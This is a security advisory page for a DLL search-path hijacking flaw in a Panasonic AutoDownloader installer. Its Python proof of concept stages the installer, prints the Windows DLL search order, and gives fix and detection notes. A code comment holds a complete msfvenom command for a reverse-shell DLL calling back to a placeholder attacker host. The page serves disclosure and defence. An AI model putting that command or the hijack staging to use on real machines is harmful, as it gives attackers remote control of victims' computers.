The installer of Panasonic AutoDownloader version 1.2.8 contains an issue with the DLL search path, which may lead to loading a crafted DLL file from the same directory as the installer.
CVSS Details
CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
Panasonic AutoDownloader 1.2.8
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11223 - Panasonic AutoDownloader DLL Search Path Hijacking PoC
# This PoC demonstrates the DLL search path hijacking vulnerability
# in Panasonic AutoDownloader installer version 1.2.8
import os
import shutil
# Step 1: Identify target DLLs that the installer attempts to load
# Common DLLs that may be hijacked include: version.dll, wininet.dll, etc.
# NOTE(review): the advisory text does not name the DLL the installer loads;
# "version.dll" is this PoC's assumed example, not a confirmed value. Confirm
# it before keying a detection rule or allow-list on this file name.
TARGET_DLL = "version.dll"
# Step 2: Create a malicious DLL using msfvenom or a custom C project
# Example msfvenom command:
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f dll -o version.dll
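def setup_attack_directory(installer_path, output_dir):
    """Stage a copy of the installer in ``output_dir`` and report the DLL path.

    The function only copies the legitimate installer and prints the path at
    which a file named ``TARGET_DLL`` would sit next to it. It never creates,
    generates or writes a DLL itself.

    Args:
        installer_path: Path to the installer executable; must be an existing
            regular file.
        output_dir: Directory that receives the copy; created if missing.

    Returns:
        True when the installer was copied, False when ``installer_path`` does
        not point to an existing file (nothing is created in that case).

    Raises:
        OSError: Propagated from ``os.makedirs`` / ``shutil.copy2``, e.g. when
            ``output_dir`` is not writable or is the installer's own directory
            (``shutil.SameFileError``).
    """
    # isfile() rather than exists(): a directory path passes exists() and
    # would only fail later, inside shutil.copy2, after output_dir was created.
    if not os.path.isfile(installer_path):
        print(f"[ERROR] Installer not found: {installer_path}")
        return False

    os.makedirs(output_dir, exist_ok=True)

    # copy2 keeps the file metadata (timestamps) of the original installer.
    staged_installer = os.path.join(output_dir, os.path.basename(installer_path))
    shutil.copy2(installer_path, staged_installer)
    print(f"[INFO] Installer copied to: {staged_installer}")

    # Path is computed for the message only; no file is written at this path.
    malicious_dll_path = os.path.join(output_dir, TARGET_DLL)
    print(f"[INFO] Place malicious DLL at: {malicious_dll_path}")
    print("[INFO] The malicious DLL should export the same functions as the legitimate one")
    return True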
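def demonstrate_search_order():
    r"""Print the Windows DLL search order that this issue depends on.

    The list is the standard desktop-application order with SafeDllSearchMode
    enabled (the Windows default):

    1. The directory where the application loaded from
    2. The system directory (C:\Windows\System32)
    3. The 16-bit system directory
    4. The Windows directory
    5. The current working directory
    6. Directories listed in the PATH environment variable

    Reviewer notes:

    * The loader consults DLL redirection, the loaded-module list and the
      KnownDLLs list before this order, so KnownDLLs entries are not resolved
      from the application directory.
    * Typical fixes on the installer side: resolve system DLLs with
      ``LoadLibraryEx(..., LOAD_LIBRARY_SEARCH_SYSTEM32)``, call
      ``SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)`` at startup,
      and for import-table dependencies link with ``/DEPENDENTLOADFLAG``.
      Which of these applies to this installer is not visible here.
    * Detection: an image-load event (e.g. Sysmon Event ID 7) where a setup
      process loads a system-named DLL from a user-writable directory such as
      a download folder.

    Returns:
        None. All output goes to stdout.
    """
    # Doubled backslashes keep the printed paths literal (no escape handling).
    search_order = (
        "1. Application directory (highest priority - VULNERABLE)",
        "2. System directory (C:\\Windows\\System32)",
        "3. 16-bit system directory",
        "4. Windows directory (C:\\Windows)",
        "5. Current working directory",
        "6. PATH environment variable directories",
    )
    print("=== Windows DLL Search Order ===")
    print("\n".join(search_order))
    print("\n[!] The installer loads DLLs from the application directory first,")
    print(" allowing an attacker to place a malicious DLL with the same name.")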
if __name__ == "__main__":
    # Banner: CVE identifier and the affected installer build.
    for banner_line in (
        "=== CVE-2025-11223 PoC: DLL Search Path Hijacking ===",
        "Target: Panasonic AutoDownloader v1.2.8 Installer\n",
    ):
        print(banner_line)

    # Only the explanatory listing runs by default; nothing is copied or
    # written unless the staging call below is enabled by hand.
    demonstrate_search_order()

    # Example usage:
    # setup_attack_directory("C:\\path\\to\\AutoDownloader_Setup.exe", "C:\\attack_dir")

    # The precondition printed here corresponds to the UI:R (user interaction
    # required) component of the advisory's CVSS vector.
    print(
        "\n[NOTE] Social engineering is required to trick the user into\n"
        " running the installer from the attacker-controlled directory."
    )